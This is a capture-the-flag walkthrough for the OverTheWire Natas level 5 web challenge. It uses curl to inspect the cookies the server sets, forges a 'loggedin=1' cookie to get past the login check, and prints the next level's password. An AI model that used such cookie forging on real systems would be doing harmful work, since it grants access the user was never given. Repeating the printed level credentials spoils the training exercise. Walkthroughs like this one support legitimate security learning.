curl -u natas5:0n35PkggAPm2zbEpOU802c0x0Msn1ToK http://natas5.natas.labs.overthewire.org

Body:

<body>
<h1>natas5</h1>
<div id="content">
Access disallowed. You are not logged in</div>
</body>

This time curl does not give much beyond the page body: “You are not logged in.” That points to session state, usually cookies. With curl you can see what cookies the server sets using -c (write cookies). Basic auth still needs -u. For example:

curl -u natas5:0n35PkggAPm2zbEpOU802c0x0Msn1ToK -c - http://natas5.natas.labs.overthewire.org
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

natas5.natas.labs.overthewire.org       FALSE   /       FALSE   0       loggedin        0

So natas5 uses a loggedin cookie (0 = not logged in). Send a cookie on the request with -b and set it to 1:

curl -u natas5:0n35PkggAPm2zbEpOU802c0x0Msn1ToK -c - http://natas5.natas.labs.overthewire.org -b 'loggedin=1'
<body>
<h1>natas5</h1>
<div id="content">
Access granted. The password for natas6 is 0RoJwHdSKWFTYR5WuiAewauSuNaBXned</div>
</body>

Cookie jar after that request (still printed because of -c -):

# Netscape HTTP Cookie File
natas5.natas.labs.overthewire.org       FALSE   /       FALSE   0       loggedin        1

Setting loggedin=1 makes the server treat the session as logged in, so the next level’s password is shown.

Password for natas6: 0RoJwHdSKWFTYR5WuiAewauSuNaBXned